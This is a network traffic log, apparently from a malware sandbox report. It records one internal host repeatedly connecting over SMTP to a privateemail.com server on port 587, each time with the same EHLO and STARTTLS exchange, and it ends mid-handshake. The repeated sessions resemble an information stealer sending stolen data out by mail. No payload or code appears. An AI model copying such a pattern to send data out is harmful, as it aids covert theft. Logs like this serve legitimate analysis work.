Feb 2, 2021 08:52:30.913746119 CET | 199.193.7.228:587 -> 192.168.2.7:49747 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:30.914057970 CET | 192.168.2.7:49747 -> 199.193.7.228:587 | STARTTLS
Feb 2, 2021 08:52:31.104008913 CET | 199.193.7.228:587 -> 192.168.2.7:49747 | 220 Ready to start TLS
Feb 2, 2021 08:52:32.490869999 CET | 199.193.7.228:587 -> 192.168.2.7:49748 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:32.491282940 CET | 192.168.2.7:49748 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:32.681601048 CET | 199.193.7.228:587 -> 192.168.2.7:49748 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:32.682013988 CET | 192.168.2.7:49748 -> 199.193.7.228:587 | STARTTLS
                                                                                                  Feb 2, 2021 08:52:32.872016907 CET58749748199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:34.427877903 CET58749750199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:34.428292990 CET49750587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:34.618705034 CET58749750199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:34.620052099 CET49750587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:34.809961081 CET58749750199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:36.613873005 CET58749751199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:36.614547968 CET49751587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:36.804939985 CET58749751199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:36.805289984 CET49751587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:36.996551037 CET58749751199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:37.736371040 CET58749752199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:37.737236977 CET49752587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:37.928690910 CET58749752199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:37.929166079 CET49752587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:38.122827053 CET58749752199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:38.495201111 CET58749753199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:38.495958090 CET49753587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:38.698676109 CET58749753199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:38.705585957 CET49753587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:38.909257889 CET58749753199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:40.640491962 CET58749754199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:40.640836954 CET49754587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:40.742924929 CET58749755199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:40.743376017 CET49755587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:40.832242012 CET58749754199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:40.833101988 CET49754587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:40.936414957 CET58749755199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:41.023488045 CET58749754199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:41.073451996 CET58749756199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:41.073873043 CET49756587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:41.264448881 CET58749756199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:41.264954090 CET49756587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:41.454988003 CET58749756199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:42.805581093 CET58749757199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:42.808633089 CET49757587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:43.001002073 CET58749757199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:43.001396894 CET49757587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:43.191638947 CET58749757199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:43.927926064 CET58749758199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:43.928359985 CET49758587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:44.119829893 CET58749758199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:44.120193958 CET49758587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:44.310609102 CET58749758199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:45.416155100 CET58749759199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:45.416457891 CET49759587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:45.606834888 CET58749759199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:45.607120991 CET49759587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:45.799350977 CET58749759199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:47.812969923 CET58749760199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:47.813316107 CET49760587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:48.015526056 CET58749760199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.015924931 CET49760587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.031583071 CET58749761199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:48.031898022 CET49761587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:48.217470884 CET58749760199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:48.222242117 CET58749761199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.225008965 CET49761587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.414846897 CET58749761199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:50.819664001 CET58749762199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:50.819951057 CET49762587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:51.013494968 CET58749762199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.015211105 CET49762587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.091154099 CET58749763199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:51.091501951 CET49763587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:51.207123995 CET58749762199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:51.282040119 CET58749763199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.282620907 CET49763587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.472697020 CET58749763199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:53.700566053 CET58749764199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:53.700826883 CET49764587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:53.891614914 CET58749764199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:53.891880035 CET49764587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:54.082276106 CET58749764199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:56.752723932 CET58749765199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:56.753062010 CET49765587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:56.944964886 CET58749765199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:56.945434093 CET49765587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:57.136822939 CET58749765199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:59.741539001 CET58749767199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:59.744452953 CET49767587192.168.2.7199.193.7.228EHLO 830021
Feb 2, 2021 08:52:59.900674105 CET  587    49768  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:59.916116953 CET  49768  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:52:59.948602915 CET  587    49767  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:52:59.948976994 CET  49767  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:00.122152090 CET  587    49768  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:00.122442961 CET  49768  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:00.152375937 CET  587    49767  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:00.325570107 CET  587    49768  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:02.618752956 CET  587    49770  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:02.619087934 CET  49770  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:02.809268951 CET  587    49770  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:02.815468073 CET  49770  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:03.005538940 CET  587    49770  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:06.514214993 CET  587    49771  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:06.514597893 CET  49771  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:06.704798937 CET  587    49771  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:06.705087900 CET  49771  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:06.894906998 CET  587    49771  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:09.670850992 CET  587    49772  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:09.671189070 CET  49772  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:09.863631010 CET  587    49772  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:09.863991976 CET  49772  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:10.054274082 CET  587    49772  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:18.489265919 CET  587    49774  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:18.489636898 CET  49774  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:18.680254936 CET  587    49774  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:18.680546045 CET  49774  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:18.870492935 CET  587    49774  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:21.223431110 CET  587    49775  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:21.350620031 CET  49775  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:21.541002035 CET  587    49775  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:21.541326046 CET  49775  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:21.733660936 CET  587    49775  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:24.606659889 CET  587    49776  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:24.607726097 CET  49776  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:24.811074972 CET  587    49776  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:24.811362028 CET  49776  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:25.012739897 CET  587    49776  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:27.989326000 CET  587    49778  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:27.989716053 CET  49778  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:28.180408955 CET  587    49778  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:28.180705070 CET  49778  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:28.373656034 CET  587    49778  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:35.901496887 CET  587    49780  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:35.901990891 CET  49780  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:36.096594095 CET  587    49780  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:36.097197056 CET  49780  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:36.239164114 CET  587    49782  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:36.239751101 CET  587    49781  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:36.284514904 CET  49782  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:36.284563065 CET  49781  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:36.289796114 CET  587    49780  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:36.486347914 CET  587    49781  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:36.486578941 CET  587    49782  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:36.486627102 CET  49781  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:36.486783028 CET  49782  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:36.687962055 CET  587    49781  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:36.688091993 CET  587    49782  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:38.683794975 CET  587    49783  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:38.684241056 CET  49783  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:38.877027988 CET  587    49783  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:38.877393961 CET  49783  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:39.067572117 CET  587    49783  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:42.474970102 CET  587    49784  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:42.475333929 CET  49784  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:42.666105986 CET  587    49784  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:42.666457891 CET  49784  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:42.856486082 CET  587    49784  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:53:45.580559969 CET  587    49786  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:53:45.580796957 CET  49786  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:53:45.782514095 CET  587    49786  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:53:45.782795906 CET  49786  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:53:45.984117031 CET  587    49786  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:13.248991013 CET  587    49790  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:13.249319077 CET  49790  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:54:13.451119900 CET  587    49790  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:54:13.451430082 CET  49790  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:54:13.652879000 CET  587    49790  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:16.356473923 CET  587    49792  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:16.359440088 CET  49792  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:54:16.551491976 CET  587    49792  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:54:16.554924011 CET  49792  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:54:16.747075081 CET  587    49792  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:19.546262026 CET  587    49793  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:19.546660900 CET  49793  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:54:19.748264074 CET  587    49793  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:54:19.748622894 CET  49793  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:54:19.949882030 CET  587    49793  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:22.712263107 CET  587    49794  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:22.712584019 CET  49794  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:54:22.903280020 CET  587    49794  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:54:22.903708935 CET  49794  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:54:23.094129086 CET  587    49794  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:24.265650034 CET  587    49795  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:24.266120911 CET  49795  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:54:24.456612110 CET  587    49795  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
